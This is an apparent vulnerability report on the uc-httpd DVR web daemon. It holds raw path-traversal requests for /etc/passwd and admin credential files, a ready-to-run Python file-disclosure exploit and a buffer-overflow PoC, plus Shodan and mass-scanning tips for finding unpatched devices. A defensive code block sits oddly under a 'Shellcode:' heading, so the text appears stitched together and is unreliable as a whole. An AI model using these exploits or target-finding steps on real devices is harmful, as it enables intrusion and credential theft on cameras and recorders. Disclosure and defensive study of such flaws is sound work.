Project Insecurity - insecurity.sh 

Uc-http daemon (DVR) - Vulnerability Report 

1.0 - Abstract:
 
uc-httpd by XiongMai Communications is widely used DVR software in which we identified several vulnerabilities in late 2016 / early 2017. These include a Local File Disclosure vulnerability (which can lead to administrative or root access to the device) and a Buffer Overflow vulnerability. Originally, over 3 million devices were susceptible to these vulnerabilities, but script-kiddies attempted to build a botnet using them, which resulted in the number of vulnerable devices dropping to around 500,000. This is a good thing, as the company in question has made no effort to produce a patch (although this may be because they are literally incapable of doing so for logistical rather than technical reasons; more on this in an upcoming blog post regarding IoT bugs). In this report we detail the two main vulnerabilities that are present, and various ways in which they can be exploited. These devices can be found on shodan.io under the product:uc-httpd search. If mass scanning IPv4 ranges, these devices can be found by looking for 'uc-httpd' in the HTTP headers.
 

2.0 - Local File (and path!) Disclosure:

By means of a simple HTTP GET request to the remote server, you can disclose either the contents of a specific file or the contents of a directory. This not only allows an attacker to read all files on the server, but also lets them skip the entire trial-and-error process: because the same GET request can display the contents of a directory, they can simply map out the server's file system. Below is an example request that would be sent to the server in order to disclose a local file:

GET ../../../../../etc/passwd HTTP/1.0 

To disclose the contents of a directory, an attacker could send a similar request but 
containing the path to the directory that they want to disclose the contents of, as opposed 
to the path for a file: 

GET ../../../../../var/www/html/ HTTP/1.0 

Although this is Local File Disclosure rather than Local File Inclusion, it is still roughly as severe in terms of impact, as getting access to the remote server is generally as simple as reading a single file. For example, an attacker could read the following file in order to obtain administrative credentials to log in to the web panel:

 
GET ../../../../../mnt/mtd/Config/Account1 HTTP/1.0 

The above request would return the username and password for an administrator account that can be used for the web-based login panel (this can be running on a variety of ports; other than the default port 80, it most commonly runs on ports 81, 8000, and 8001). Below is an example of what the login panel looks like:

 
In addition to this, on many of these servers you can simply read /etc/passwd and SSH into the server as a user with root access. There is no encryption for the root password stored within that file, as seen in the image below:

The following proof-of-concept script can be used to disclose the contents of any file or 
directory: 

#!/usr/bin/env python
import urllib2, httplib, sys

# Force an HTTP/1.0 request line, matching the raw requests shown above
httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0'

print "[+] uc-httpd 0day exploiter [+]"
print "[+] usage: python " + __file__ + " http://<target_ip>"

host = sys.argv[1]
fd = raw_input('[+] File or Directory: ')

print "Exploiting....."
print '\n'
print urllib2.urlopen(host + '/../../../../..' + fd).read()

Although some files cannot be read without being a root user, the fact that the passwd file contains unencrypted root passwords generally makes the inability to read _all_ files a non-issue.

 
3.0 - (bonus!) Buffer Overflows:

If the above methods don't work, the following Buffer Overflow can be used as a means of gaining access instead. The vast majority of these servers have Address Space Layout Randomization in place as a security mechanism, but because the LFD vulnerability is present, ASLR can be defeated without prior access to the vulnerable server being a prerequisite: the leaked memory addresses needed to do so can be read from /proc entries.

Below is a python PoC demonstrating the buffer overflow, which overwrites the stack and 
waits for the kernel watchdog to restart Sofia (to be used in conjunction with the LFD in 
order to bypass ASLR protections): 

import mechanize, time, sys, urllib, socket
from termcolor import colored

print colored('uc-httpd web-daemon bufferoverflow', 'red')
print colored('- Overwrites the stack (attach to see)', 'red')
print colored('- Kernel watchdog module restarts Sofia after 2 minutes', 'red')
time.sleep(2)

def at_login_overflow():
    print colored('Sending payload.. ', 'red')
    s_c = "\x2f\x4c\x6f\x67\x69\x6e\x2e\x68\x74\x6d" # Page id ("/Login.htm")
    x = mechanize.Browser()
    x.set_handle_robots(False)
    x.set_debug_responses(True)
    x.addheaders = [("User-agent",
                     "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")]

    login = x.open(tar_full + s_c)
    x.select_form(nr=0)

    # Oversized username field is what overruns the stack buffer
    x["username"] = buffersm
    x["password"] = "mikevirushackinglimited"

    try:
        x.submit()
    except Exception:
        print colored('Target daemon not vulnerable.', 'red')
        pass

    check_conn()


# Check interface status
def check_conn():
    time.sleep(1)
    print colored('Checking interface status..', 'red')
    try:
        urllib.urlopen(tar_full)
        print colored('Exploit failed', 'red')
    except Exception:
        print colored('Finished.', 'red')
        pass

tar = sys.argv[1]
tar_p = sys.argv[2]
buff_size = sys.argv[3]

tar_full = "http://" + tar + ":" + tar_p

# rec 180
buffersm = "\x41" * int(buff_size)

# post only
at_login_overflow()
 

Shellcode: 

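The containment check uc-httpd is missing, written here as an added example (not the project's code): every request-target is resolved against an assumed document root and anything that escapes it, or names a directory, is refused, which closes both the traversal requests of section 2 and the /proc reads section 3 relies on to defeat ASLR. The triage function applies the same rule to request lines in an assumed log format so a defender can spot these requests in proxy or IDS records; the sample lines are constructed.

```python
"""Docroot containment and request-line triage for the traversal above.
Added example, not uc-httpd code; the document root and log format are
assumptions made for illustration."""
import posixpath
import re
from urllib.parse import unquote, urlsplit

DOCROOT = "/var/www/html"  # assumed document root
# Request line as a reverse proxy or IDS might record it (assumed format).
REQ_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/\d\.\d"')


def resolve_target(target, docroot=DOCROOT):
    """Return the file to serve for a request-target, or None to refuse.

    Refuses anything that climbs out of docroot (so /etc, /mnt and /proc
    are all unreachable), percent-encoded ".." included, and refuses any
    directory. This is the check the daemon lacks.
    """
    path = unquote(urlsplit(target).path)       # decode once, drop ?query
    if not path or path.endswith("/"):
        return None                              # no directory listings
    # A relative target ("../../etc/passwd") is resolved from the root,
    # just as the unchecked daemon does; normpath then collapses "..".
    full = posixpath.normpath(docroot + "/" + path.lstrip("/"))
    if full == docroot or not full.startswith(docroot + "/"):
        return None                              # escaped the root
    return full


def triage(log_text, docroot=DOCROOT):
    """Return (client, target, verdict) for each request line in log_text."""
    rows = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if m:
            ok = resolve_target(m["target"], docroot) is not None
            rows.append((line.split()[0], m["target"], "serve" if ok else "REJECT"))
    return rows


# Constructed sample; the first three mirror the requests shown in this report.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Feb/2017:10:00:01 +0000] "GET ../../../../../etc/passwd HTTP/1.0" 200 812
192.0.2.10 - - [01/Feb/2017:10:00:02 +0000] "GET ../../../../../var/www/html/ HTTP/1.0" 200 4096
192.0.2.10 - - [01/Feb/2017:10:00:03 +0000] "GET ../../../../../mnt/mtd/Config/Account1 HTTP/1.0" 200 96
192.0.2.11 - - [01/Feb/2017:10:00:04 +0000] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 812
192.0.2.12 - - [01/Feb/2017:10:00:05 +0000] "GET /css/../Login.htm HTTP/1.1" 200 2048
"""
```

Running `triage(SAMPLE_LOG)` marks the first four lines REJECT and only the last one serve; a legitimate `..` that stays inside the root is still normalised rather than refused.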

4.0 - Remediation:
 
Sadly, this vulnerability is very hard to remediate, as it would require the device manufacturers to perform a product recall on all of their devices, because the firmware itself is half of the issue; they cannot remotely push out a patch for it. Morally speaking, mass bricking the devices would be the best option, although doing so would be illegal and we most certainly do not condone such actions.
